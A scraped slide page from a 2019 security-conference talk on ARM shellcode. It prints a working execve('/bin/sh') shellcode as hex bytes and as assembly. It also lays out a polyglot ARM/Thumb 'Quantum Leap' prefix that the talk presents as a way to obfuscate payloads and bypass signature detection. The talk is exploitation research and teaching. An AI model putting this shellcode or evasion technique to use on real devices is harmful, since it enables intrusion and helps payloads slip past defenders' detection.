Saumil Shah, profile picture
Uploaded bySaumil Shah
679 views

Schrödinger's ARM Assembly

Saumil Shah's presentation at Snoopcon 2019 focuses on ARM shellcode techniques, including polyglot tricks and the implementation of 'quantum leap' shellcode that switches between ARM and Thumb modes. The talk highlights the intricacies and benefits of using ARM and Thumb instruction encodings for efficient shellcode execution while avoiding signature detection. The presentation concludes with the potential for further exploration in ARM shellcoding opportunities.

Embed presentation

NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 Schrödinger's Arm Assembly SNOOPCON 2019 SAUMIL SHAH @THEREALSAUMIL ★ ★
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 # who am i CEO Net-square • Hacker, Speaker, Trainer, Author. • M.S. Computer Science Purdue University. • LinkedIn: saumilshah • Twitter: @therealsaumil
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 Agenda • A background on ARM shellcode • My research around ARM shellcode – polyglot tricks - ARM Quantum Leap shellcode • Demos
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 Example: ARM execve() Shellcode exec command "/bin/sh" 01 10 8f e2 11 ff 2f e1 02 a0 49 40 52 40 c2 71 0b 27 01 df 2f 62 69 6e 2f 73 68 5a
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 Example: ARM execve() Shellcode .section .text .global _start _start: .code 32 add r1, pc, #1 bx r1 .code 16 adr r0, SHELL eor r1, r1, r1 eor r2, r2, r2 strb r2, [r0, #7] mov r7, #11 svc #1 .balign 4 SHELL: .ascii "/bin/shZ" Switch to Thumb mode: branch pc + 1 ARM CODE 00: e28f1001 add r1, pc, #1 04: e12fff11 bx r1 THUMB CODE 08: a002 add r0, pc, #8 0a: 4049 eors r1, r1 0c: 4052 eors r2, r2 0e: 71c2 strb r2, [r0, #7] 10: 270b movs r7, #11 12: df01 svc 1 LITERAL POOL 14: 6e69622f .word 0x6e69622f 18: 5a68732f .word 0x5868732f
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 Example: ARM execve() Shellcode .section .text .global _start _start: .code 32 add r1, pc, #1 bx r1 .code 16 adr r0, SHELL eor r1, r1, r1 eor r2, r2, r2 strb r2, [r0, #7] mov r7, #11 svc #1 .balign 4 SHELL: .ascii "/bin/shZ" Switch to Thumb mode: branch pc + 1 • Mostly begins with an ARM-to-Thumb mode switch. • Rest of the shellcode implemented in Thumb mode. • Compact, avoids bad characters, etc.
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 ARM Mode • 4 byte (32 bits) width • Can use ALL registers in operands (r0-r10) • Conditional Execution • Efficient code THUMB Mode • 2 byte (16 bits) width • Can use LIMITED registers in operands (r0-r7 only) • No Conditional Execution • Compact code • Released with ARM7TDMI
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 Some Concerns / Arguments • "I can signature this" - YARA, IDS, … • Thumb-only processor? e.g: STM32 One Shellcode To Run Them All ! ! 01 10 8f e2 11 ff 2f e1 02 a0 49 40 52 40 c2 71 0b 27 01 df 2f 62 69 6e 2f 73 68 5a
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 1 1 1 0 0 0 1 1 1 0 1 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 1 1 1 condition mov operand1 r1 #7 ARM/THUMB Encoding: mov r1, #7 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 0 0 1 0 0 0 0 1 0 0 0 0 0 1 1 1 mov r1 #7 32 bit ARM instruction 16 bit Thumb instruction
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 Schrödinger's Instruction Set SAME SAME DIFFERENT BUT ARM THUMB
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 Opening the Box N Z C V Q J GE E A I F T M Negative Zero Carry oVerflow underflow Jazelle SIMD Endianness Abortdisable IRQdisable FIQdisable Thumb privilege mode
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019QUANTUM LEAP SHELLCODE
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 "Quantum Leap" Shellcode Start in THUMB modeStart in ARM mode THUMB shellcode (execve, reverse, …) THUMB shellcode (execve, reverse, …) "LEAP" TO THUMB mode PASS THROUGH PASS THROUGH PASS THROUGH QUANTUM LEAP Same Same But Different
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 "Quantum Leap" - what we need • An deeper understanding of ARM and Thumb instruction encoding: – ARM instruction: "DO SOMETHING" – 2 THUMB instructions: "PASS THROUGH" • Conditional Execution in ARM instructions – very helpful! • A little bit of luck and perseverance. • Nomenclature Credit: "dialup" @44CON.
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 The ARM to Thumb switch • Avoid "destructive" instructions – Branches, Load/Store, Floating Point, etc. – Illegal instructions. • Also work on ARMv6 (no Thumb2) 0: e28f1001 add r1, pc, #1 4: e12fff11 bx r1 8: 270b movs r7, #11 a: beff bkpt 0x00ff 0: 1001 asrs r1, r0, #32 2: e28f b.n 524 4: ff11 e12f vrhadd.u16 d14,d1,d31 8: 270b movs r7, #11 a: beff bkpt 0x00ff ORIGINAL ARM CODE (T = 0) "THUMB VIEW" (T = 1)
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 ARM and THUMB decoding - 1 e28f1001 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1 4 BYTE ARM INSTRUCTION - add r1, pc, #1 conditional opcodestatus operand 1 destination operand 2 Thumb instruction 2 Thumb instruction 1 • Controlled by ARM Opcode and conditional flags. • Part influenced by Operand 1 (ARM). • Trickier to control. • Controlled by Destination and Operand 2 of the ARM instruction. • Easier to control. im m ediate
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 ARM and THUMB decoding - 1 e28f1001 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1 1001 0001 0000 0000 0001 asrs r1,r0,#32 e28f 1110 0010 1000 1111 b 524 1 ARM INSTRUCTION RESULTING INTO 2 THUMB INSTRUCTIONS: conditional opcodestatus destination operand 2 im m ediate Branch instructions are destructive Thumb Opcode 2 influenced by ARM conditional bits operand 1 Thumb Opcode 1 influenced by ARM destination operand Have to tweak conditional bits
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 Conditional Instructions • How do we change the conditional bits? • Eh… what ARE "conditional bits?" ! • Every ARM instruction can be made CONDITIONAL. • addne triggers ONLY if a "not equals" condition exists (zero flag = 0) add r1, pc, #1 addne r1, pc, #1 ADD ADD IF NOT EQUALS
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 Conditional Suffixes EQ Equal To Z == 1 NE Not Equal To Z == 0 GT Greater Than (signed) Z == 0 && N == V GE Greater Than or Equal To (signed) N == V LT Less Than (signed) N != V LE Less Than or Equal To (signed) Z == 1 || N != V HI Higher (unsigned) C == 1 && Z == 0 LS Lesser (unsigned) C == 0 || Z == 1 CS Carry Set C == 1 CC Carry Clear C == 0 MI Minus / Negative N == 1 PL Plus / Positive N == 0 VS Overflow Set V == 1 VC Overflow Clear V == 0
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 (Un)conditional Instructions • How can we turn an ARM instruction into a conditional instruction… • …with guaranteed execution everytime? • COMPLIMENTARY CONDITIONS! • One of the instructions is guaranteed to execute, irrespective of condition flags. e28f1001 add r1, pc, #1 128f1005 addne r1, pc, #5 028f1001 addeq r1, pc, #1 UNCONDITIONAL INSTRUCTION COMPLIMENTARY CONDITIONS
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 ARM and THUMB decoding - 2 128f1005: 0001 0010 1000 1111 0001 0000 0000 0101 addne r1,pc,#5 1005: 0001 0000 0000 0101 asrs r5,r0,#32 128f: 0001 0010 1000 1111 asrs r7,r1,#10 028f1001: 0000 0010 1000 1111 0001 0000 0000 0001 addeq r1,pc,#1 1001: 0001 0000 0000 0001 asrs r1,r0,#32 028f: 0000 0010 1000 1111 lsls r7,r1,#10 USING CONDITIONAL ARM INSTRUCTIONS: conditional opcodestatus destination operand 2 im m ediate No destructive instructions in Thumb mode Complimentary Conditional ARM instructions operand 1
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 Final "Quantum Leap" Code 0: 228fa019 addcs sl, pc, #25 4: 328fa015 addcc sl, pc, #21 8: 21a0400d movcs r4, sp c: 31a0400d movcc r4, sp 10: 292d0412 pushcs {r1, r4, sl} 14: 392d0412 pushcc {r1, r4, sl} 18: 28bda002 popcs {r1, sp, pc} 1c: 38bda002 popcc {r1, sp, pc} 20: REGULAR SHELLCODE FOLLOWS 22: IN THUMB MODE FROM NOW ON 0: a019 add r0, pc, #100 2: 228f movs r2, #143 4: a015 add r0, pc, #84 6: 328f adds r2, #143 8: 400d ands r5, r1 a: 21a0 movs r1, #160 c: 400d ands r5, r1 e: 31a0 adds r1, #160 10: 0412 lsls r2, r2, #16 12: 292d cmp r1, #45 14: 0412 lsls r2, r2, #16 16: 392d subs r1, #45 18: a002 add r0, pc, #8 1a: 28bd cmp r0, #189 1c: a002 add r0, pc, #8 1e: 38bd subs r0, #189 20: REGULAR SHELLCODE FOLLOWS 22: IN THUMB MODE FROM NOW ON QUANTUM LEAP: ARM TO THUMB QUANTUM LEAP: PASS THROUGH (THUMB)
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 Assembling the Quantum Leap • Took many iterations to finalise! • bx sl implemented by push {sl}, pop {pc}. • Register list proved to be a challenge. • Registers r4, sl altered in ARM. • Registers r0, r1, r2, r5 altered in Thumb. • No Thumb2 instructions. • No NULL bytes.
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019DEMO QUANTUM LEAP SHELLCODE
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 Conclusion • ARM/Thumb Polyglot instructions offer many opportunities for OBFUSCATION and SIGNATURE bypass. • Lots of exploration opportunities in ARM shellcoding. https://github.com/therealsaumil/arm_shellcode
NETSQUARE (c) SAUMIL SHAHSNOOPCON 2019 exit(0) SNOOPCON 2019 SAUMIL SHAH @THEREALSAUMIL ★ ★

More Related Content

PDF
HackLU 2018 Make ARM Shellcode Great Again
bySaumil Shah
 
PDF
Make ARM Shellcode Great Again - HITB2018PEK
bySaumil Shah
 
PDF
ARM Polyglot Shellcode - HITB2019AMS
bySaumil Shah
 
PDF
DMVPN Lab WorkBook
byRHC Technologies
 
PDF
SICP勉強会について
byYusuke Sasaki
 
PDF
Make ARM Shellcode Great Again
bySaumil Shah
 
PDF
6to4tunnel sample config
byjebong03
 
DOCX
CODING IN ARDUINO
byS Ayub
 
HackLU 2018 Make ARM Shellcode Great Again
bySaumil Shah
 
Make ARM Shellcode Great Again - HITB2018PEK
bySaumil Shah
 
ARM Polyglot Shellcode - HITB2019AMS
bySaumil Shah
 
DMVPN Lab WorkBook
byRHC Technologies
 
SICP勉強会について
byYusuke Sasaki
 
Make ARM Shellcode Great Again
bySaumil Shah
 
6to4tunnel sample config
byjebong03
 
CODING IN ARDUINO
byS Ayub
 

What's hot

PDF
Hp dv6 7000 goya balen 11254-3
byJosPinaya
 
PDF
What the Fax!?
byPriyanka Aash
 
PDF
Hackers vs Hackers
byjobandesther
 
PDF
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
byMiguel Arroyo
 
PDF
Vhdl practical exam guide
byEslam Mohammed
 
PDF
Lathe Spindle Sensor
byJoeCritt
 
PPT
Hexapod ppt
byshiv kumar rai
 
PDF
0.47 inch LCD Micro Dispalay 800x600 Resolution RGB Interface LCD Screen
byShawn Lee
 
PDF
Using ARM Dev.Board in physical experimental instruments
bya_n0v
 
PDF
Dronecode: software open source em drones
byInternational Drone Day Campinas
 
PDF
PCIeDuino328 Schematic v1
byGergely Imreh
 
PDF
Diagrama de bloques manejo de materiales
byRoberto Díaz
 
PPTX
伺服馬達控制
by艾思程式教育
 
PDF
Mpc6585 hardware manual v1.4
byJefferson Giovani
 
PDF
Arduino uno-schematic reference design
byRimsky Cheng
 
PPT
W8_2: Inside the UoS Educational Processor
byDaniel Roggen
 
DOCX
CET4811_FINAL_LAB
byClara Irizarry
 
PDF
IPv6 Basics
byRHC Technologies
 
PDF
Verifikation - Metoder og Libraries
byInfinIT - Innovationsnetværket for it
 
PDF
Weapons grade React by Ken Wheeler
byReact London 2017
 
Hp dv6 7000 goya balen 11254-3
byJosPinaya
 
What the Fax!?
byPriyanka Aash
 
Hackers vs Hackers
byjobandesther
 
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
byMiguel Arroyo
 
Vhdl practical exam guide
byEslam Mohammed
 
Lathe Spindle Sensor
byJoeCritt
 
Hexapod ppt
byshiv kumar rai
 
0.47 inch LCD Micro Dispalay 800x600 Resolution RGB Interface LCD Screen
byShawn Lee
 
Using ARM Dev.Board in physical experimental instruments
bya_n0v
 
Dronecode: software open source em drones
byInternational Drone Day Campinas
 
PCIeDuino328 Schematic v1
byGergely Imreh
 
Diagrama de bloques manejo de materiales
byRoberto Díaz
 
伺服馬達控制
by艾思程式教育
 
Mpc6585 hardware manual v1.4
byJefferson Giovani
 
Arduino uno-schematic reference design
byRimsky Cheng
 
W8_2: Inside the UoS Educational Processor
byDaniel Roggen
 
CET4811_FINAL_LAB
byClara Irizarry
 
IPv6 Basics
byRHC Technologies
 
Verifikation - Metoder og Libraries
byInfinIT - Innovationsnetværket for it
 
Weapons grade React by Ken Wheeler
byReact London 2017
 

Similar to Schrödinger's ARM Assembly

PDF
ARM Architecture Instruction Set
byDwight Sabio
 
PPT
ARM architecture and its working principle
byecehod26
 
PDF
ESD_05_ARM_Instructions set for preparation
byssuser026e94
 
PDF
Arm instruction set
byMathivanan Natarajan
 
PPT
arm_architecture_overview_LPC2148_Arm.ppt
byprbhusari
 
PPT
The ARM Architecture: ARM : ARM Architecture
bysreea4
 
PPTX
Module 2 ARM CORTEX M3 Instruction Set and Programming
byAmogha Bandrikalli
 
PPT
06. thumb instructions
bybalaji raja rajan Venkatachalam
 
PPTX
ARM-7 ADDRESSING MODES INSTRUCTION SET
bySasiBhushan22
 
PPT
ARM.ppt
byMostafaParvin1
 
PDF
Arm instruction set and the thumb instructions
byChaitramahendra
 
PPT
Arm teaching material
byJohn Williams
 
PPT
Arm
bySuresh Kaliyaperumal
 
PPTX
Chapter_04_ARM_Assembly ARM assembly language is the low-level programming.pptx
byElisée Ndjabu
 
PPTX
Chapter_04_ARM_Assembly.pptx ARM ASSEMBLY CODE
byNagarathnaRajur2
 
PPTX
microprocessors and ARM Assembly Language
byJoelAttati
 
PPTX
mod 4-2.pptx
bylekha349785
 
PDF
Arm
by霖浩 王
 
PPTX
Armsim (simualtor)
byVidhi Shah
 
PPT
Arm teaching material
byNilesh Bhandare
 
ARM Architecture Instruction Set
byDwight Sabio
 
ARM architecture and its working principle
byecehod26
 
ESD_05_ARM_Instructions set for preparation
byssuser026e94
 
Arm instruction set
byMathivanan Natarajan
 
arm_architecture_overview_LPC2148_Arm.ppt
byprbhusari
 
The ARM Architecture: ARM : ARM Architecture
bysreea4
 
Module 2 ARM CORTEX M3 Instruction Set and Programming
byAmogha Bandrikalli
 
06. thumb instructions
bybalaji raja rajan Venkatachalam
 
ARM-7 ADDRESSING MODES INSTRUCTION SET
bySasiBhushan22
 
ARM.ppt
byMostafaParvin1
 
Arm instruction set and the thumb instructions
byChaitramahendra
 
Arm teaching material
byJohn Williams
 
Arm
bySuresh Kaliyaperumal
 
Chapter_04_ARM_Assembly ARM assembly language is the low-level programming.pptx
byElisée Ndjabu
 
Chapter_04_ARM_Assembly.pptx ARM ASSEMBLY CODE
byNagarathnaRajur2
 
microprocessors and ARM Assembly Language
byJoelAttati
 
mod 4-2.pptx
bylekha349785
 
Arm
by霖浩 王
 
Armsim (simualtor)
byVidhi Shah
 
Arm teaching material
byNilesh Bhandare
 

More from Saumil Shah

PDF
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
bySaumil Shah
 
PDF
ARM IoT Firmware Emulation Workshop
bySaumil Shah
 
PDF
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
bySaumil Shah
 
PDF
INSIDE ARM-X Cansecwest 2020
bySaumil Shah
 
PDF
Cybersecurity In India - The Decade Ahead
bySaumil Shah
 
PDF
The Road To Defendable Systems - Emirates NBD
bySaumil Shah
 
PDF
Introducing ARM-X
bySaumil Shah
 
PDF
Cross Border Cyber Attacks: Impact on Digital Sovereignty
bySaumil Shah
 
PDF
Announcing ARMX Docker - DC11332
bySaumil Shah
 
PDF
Precise Presentations
bySaumil Shah
 
PDF
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
bySaumil Shah
 
PDF
The Hand That Strikes, Also Blocks
bySaumil Shah
 
PDF
INSIDE ARM-X - Countermeasure 2019
bySaumil Shah
 
PDF
NSConclave2020 The Decade Behind And The Decade Ahead
bySaumil Shah
 
PDF
Cyberspace And Security - India's Decade Ahead
bySaumil Shah
 
PDF
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
bySaumil Shah
 
PDF
Effective Webinars: Presentation Skills for a Virtual Audience
bySaumil Shah
 
PDF
The CISO's Dilemma HITBGSEC2019
bySaumil Shah
 
PDF
The CISO's Dilemma 44CON 2019
bySaumil Shah
 
PDF
What Makes a Compelling Photograph
bySaumil Shah
 
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
bySaumil Shah
 
ARM IoT Firmware Emulation Workshop
bySaumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
bySaumil Shah
 
INSIDE ARM-X Cansecwest 2020
bySaumil Shah
 
Cybersecurity In India - The Decade Ahead
bySaumil Shah
 
The Road To Defendable Systems - Emirates NBD
bySaumil Shah
 
Introducing ARM-X
bySaumil Shah
 
Cross Border Cyber Attacks: Impact on Digital Sovereignty
bySaumil Shah
 
Announcing ARMX Docker - DC11332
bySaumil Shah
 
Precise Presentations
bySaumil Shah
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
bySaumil Shah
 
The Hand That Strikes, Also Blocks
bySaumil Shah
 
INSIDE ARM-X - Countermeasure 2019
bySaumil Shah
 
NSConclave2020 The Decade Behind And The Decade Ahead
bySaumil Shah
 
Cyberspace And Security - India's Decade Ahead
bySaumil Shah
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
bySaumil Shah
 
Effective Webinars: Presentation Skills for a Virtual Audience
bySaumil Shah
 
The CISO's Dilemma HITBGSEC2019
bySaumil Shah
 
The CISO's Dilemma 44CON 2019
bySaumil Shah
 
What Makes a Compelling Photograph
bySaumil Shah
 

Recently uploaded

PDF
C_ABAPD_2507 (83%).pdf antwoten certificate
byImaneKrioutate
 
PDF
CatoCoin (CATO) – Smart Contract Security Audit Report by EtherAuthority
byEtherAuthority
 
PDF
Problem Solving_20241203_220045_0000.pdf
bythakurayush00991
 
PDF
How Fireworks AI Achieves 1TB_s+ Throughput for Model Deployment Across Multi...
byAlluxio, Inc.
 
PDF
Princeton 2026: Tools That Help You
 Write Better Code
byHenry Schreiner
 
PDF
DSD-INT 2025 iMOD Coupler - coupling Ribasim – MetaSWAP – MODFLOW 6 - Leander
byDeltares
 
PDF
our environment ppt made by many people name rarang yadav
byrarang180
 
PPTX
Instrumentation.Instrumentation.Instrumentation.pptx
byDavid Kurtz
 
PDF
DSD-INT 2025 Large scale unsaturated zone modelling - Sequential Steady State...
byDeltares
 
PPTX
Performance Engineering: New and Conflicting Trends
byAlexander Podelko
 
PPTX
Project System Presentation details process presentation
bytejpratappandey4
 
PPTX
Introduction to Software Development and Modern Practices
byM Munim
 
PDF
828275126-INTUNE-Instructor-Handout-Part2.pdf
byamdusias67
 
PPTX
Orion Context Broker introduction 20260114
byFermin Galan
 
PPTX
Business Central and Copilot pitch deck ppt
byjonbravetti
 
PPTX
Free AI Paraphrasing Tool to Rewrite Sentences – SENTENCIFY
bySENTENCIFY
 
PPTX
Feasibility Analysis in System Development Using Data Flow Diagrams
byM Munim
 
PPTX
ONLINE TRAVEL BUSINESS SOFTWARE | BUSINESS TRAVEL SOFTWARE
byphilipnathen82
 
PPTX
EMR Software for Gynaecology Clinics How EasyClinic Supports Continuity, Priv...
byEasy Clinic
 
PDF
Cybernetic Global Intelligence Securing Businesses in a Digital-First World.pdf
byCybernetic Global Intelligence
 
C_ABAPD_2507 (83%).pdf antwoten certificate
byImaneKrioutate
 
CatoCoin (CATO) – Smart Contract Security Audit Report by EtherAuthority
byEtherAuthority
 
Problem Solving_20241203_220045_0000.pdf
bythakurayush00991
 
How Fireworks AI Achieves 1TB_s+ Throughput for Model Deployment Across Multi...
byAlluxio, Inc.
 
Princeton 2026: Tools That Help You
 Write Better Code
byHenry Schreiner
 
DSD-INT 2025 iMOD Coupler - coupling Ribasim – MetaSWAP – MODFLOW 6 - Leander
byDeltares
 
our environment ppt made by many people name rarang yadav
byrarang180
 
Instrumentation.Instrumentation.Instrumentation.pptx
byDavid Kurtz
 
DSD-INT 2025 Large scale unsaturated zone modelling - Sequential Steady State...
byDeltares
 
Performance Engineering: New and Conflicting Trends
byAlexander Podelko
 
Project System Presentation details process presentation
bytejpratappandey4
 
Introduction to Software Development and Modern Practices
byM Munim
 
828275126-INTUNE-Instructor-Handout-Part2.pdf
byamdusias67
 
Orion Context Broker introduction 20260114
byFermin Galan
 
Business Central and Copilot pitch deck ppt
byjonbravetti
 
Free AI Paraphrasing Tool to Rewrite Sentences – SENTENCIFY
bySENTENCIFY
 
Feasibility Analysis in System Development Using Data Flow Diagrams
byM Munim
 
ONLINE TRAVEL BUSINESS SOFTWARE | BUSINESS TRAVEL SOFTWARE
byphilipnathen82
 
EMR Software for Gynaecology Clinics How EasyClinic Supports Continuity, Priv...
byEasy Clinic
 
Cybernetic Global Intelligence Securing Businesses in a Digital-First World.pdf
byCybernetic Global Intelligence
 

Schrödinger's ARM Assembly

  • 1.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 Schrödinger's Arm Assembly SNOOPCON 2019 SAUMIL SHAH @THEREALSAUMIL ★ ★
  • 2.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 # who am i CEO Net-square • Hacker, Speaker, Trainer, Author. • M.S. Computer Science Purdue University. • LinkedIn: saumilshah • Twitter: @therealsaumil
  • 3.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 Agenda • A background on ARM shellcode • My research around ARM shellcode – polyglot tricks - ARM Quantum Leap shellcode • Demos
  • 4.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 Example: ARM execve() Shellcode exec command "/bin/sh" 01 10 8f e2 11 ff 2f e1 02 a0 49 40 52 40 c2 71 0b 27 01 df 2f 62 69 6e 2f 73 68 5a
  • 5.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 Example: ARM execve() Shellcode .section .text .global _start _start: .code 32 add r1, pc, #1 bx r1 .code 16 adr r0, SHELL eor r1, r1, r1 eor r2, r2, r2 strb r2, [r0, #7] mov r7, #11 svc #1 .balign 4 SHELL: .ascii "/bin/shZ" Switch to Thumb mode: branch pc + 1 ARM CODE 00: e28f1001 add r1, pc, #1 04: e12fff11 bx r1 THUMB CODE 08: a002 add r0, pc, #8 0a: 4049 eors r1, r1 0c: 4052 eors r2, r2 0e: 71c2 strb r2, [r0, #7] 10: 270b movs r7, #11 12: df01 svc 1 LITERAL POOL 14: 6e69622f .word 0x6e69622f 18: 5a68732f .word 0x5868732f
  • 6.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 Example: ARM execve() Shellcode .section .text .global _start _start: .code 32 add r1, pc, #1 bx r1 .code 16 adr r0, SHELL eor r1, r1, r1 eor r2, r2, r2 strb r2, [r0, #7] mov r7, #11 svc #1 .balign 4 SHELL: .ascii "/bin/shZ" Switch to Thumb mode: branch pc + 1 • Mostly begins with an ARM-to-Thumb mode switch. • Rest of the shellcode implemented in Thumb mode. • Compact, avoids bad characters, etc.
  • 7.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 ARM Mode • 4 byte (32 bits) width • Can use ALL registers in operands (r0-r10) • Conditional Execution • Efficient code THUMB Mode • 2 byte (16 bits) width • Can use LIMITED registers in operands (r0-r7 only) • No Conditional Execution • Compact code • Released with ARM7TDMI
  • 8.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 Some Concerns / Arguments • "I can signature this" - YARA, IDS, … • Thumb-only processor? e.g: STM32 One Shellcode To Run Them All ! ! 01 10 8f e2 11 ff 2f e1 02 a0 49 40 52 40 c2 71 0b 27 01 df 2f 62 69 6e 2f 73 68 5a
  • 9.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 1 1 1 0 0 0 1 1 1 0 1 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 1 1 1 condition mov operand1 r1 #7 ARM/THUMB Encoding: mov r1, #7 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 0 0 1 0 0 0 0 1 0 0 0 0 0 1 1 1 mov r1 #7 32 bit ARM instruction 16 bit Thumb instruction
  • 10.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 Schrödinger's Instruction Set SAME SAME DIFFERENT BUT ARM THUMB
  • 11.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 Opening the Box N Z C V Q J GE E A I F T M Negative Zero Carry oVerflow underflow Jazelle SIMD Endianness Abortdisable IRQdisable FIQdisable Thumb privilege mode
  • 12.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019QUANTUM LEAP SHELLCODE
  • 13.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 "Quantum Leap" Shellcode Start in THUMB modeStart in ARM mode THUMB shellcode (execve, reverse, …) THUMB shellcode (execve, reverse, …) "LEAP" TO THUMB mode PASS THROUGH PASS THROUGH PASS THROUGH QUANTUM LEAP Same Same But Different
  • 14.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 "Quantum Leap" - what we need • An deeper understanding of ARM and Thumb instruction encoding: – ARM instruction: "DO SOMETHING" – 2 THUMB instructions: "PASS THROUGH" • Conditional Execution in ARM instructions – very helpful! • A little bit of luck and perseverance. • Nomenclature Credit: "dialup" @44CON.
  • 15.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 The ARM to Thumb switch • Avoid "destructive" instructions – Branches, Load/Store, Floating Point, etc. – Illegal instructions. • Also work on ARMv6 (no Thumb2) 0: e28f1001 add r1, pc, #1 4: e12fff11 bx r1 8: 270b movs r7, #11 a: beff bkpt 0x00ff 0: 1001 asrs r1, r0, #32 2: e28f b.n 524 4: ff11 e12f vrhadd.u16 d14,d1,d31 8: 270b movs r7, #11 a: beff bkpt 0x00ff ORIGINAL ARM CODE (T = 0) "THUMB VIEW" (T = 1)
  • 16.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 ARM and THUMB decoding - 1 e28f1001 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1 4 BYTE ARM INSTRUCTION - add r1, pc, #1 conditional opcodestatus operand 1 destination operand 2 Thumb instruction 2 Thumb instruction 1 • Controlled by ARM Opcode and conditional flags. • Part influenced by Operand 1 (ARM). • Trickier to control. • Controlled by Destination and Operand 2 of the ARM instruction. • Easier to control. im m ediate
  • 17.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 ARM and THUMB decoding - 1 e28f1001 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1 1001 0001 0000 0000 0001 asrs r1,r0,#32 e28f 1110 0010 1000 1111 b 524 1 ARM INSTRUCTION RESULTING INTO 2 THUMB INSTRUCTIONS: conditional opcodestatus destination operand 2 im m ediate Branch instructions are destructive Thumb Opcode 2 influenced by ARM conditional bits operand 1 Thumb Opcode 1 influenced by ARM destination operand Have to tweak conditional bits
  • 18.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 Conditional Instructions • How do we change the conditional bits? • Eh… what ARE "conditional bits?" ! • Every ARM instruction can be made CONDITIONAL. • addne triggers ONLY if a "not equals" condition exists (zero flag = 0) add r1, pc, #1 addne r1, pc, #1 ADD ADD IF NOT EQUALS
  • 19.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 Conditional Suffixes EQ Equal To Z == 1 NE Not Equal To Z == 0 GT Greater Than (signed) Z == 0 && N == V GE Greater Than or Equal To (signed) N == V LT Less Than (signed) N != V LE Less Than or Equal To (signed) Z == 1 || N != V HI Higher (unsigned) C == 1 && Z == 0 LS Lesser (unsigned) C == 0 || Z == 1 CS Carry Set C == 1 CC Carry Clear C == 0 MI Minus / Negative N == 1 PL Plus / Positive N == 0 VS Overflow Set V == 1 VC Overflow Clear V == 0
  • 20.
    NETSQUARE (c) SAUMILSHAHSNOOPCON 2019 (Un)conditional Instructions • How can we turn an ARM instruction into a conditional instruction… • …with guaranteed execution everytime? • COMPLIMENTARY CONDITIONS! • One of the instructions is guaranteed to execute, irrespective of condition flags. e28f1001 add r1, pc, #1 128f1005 addne r1, pc, #5 028f1001 addeq r1, pc, #1 UNCONDITIONAL INSTRUCTION COMPLIMENTARY CONDITIONS
  • 21.
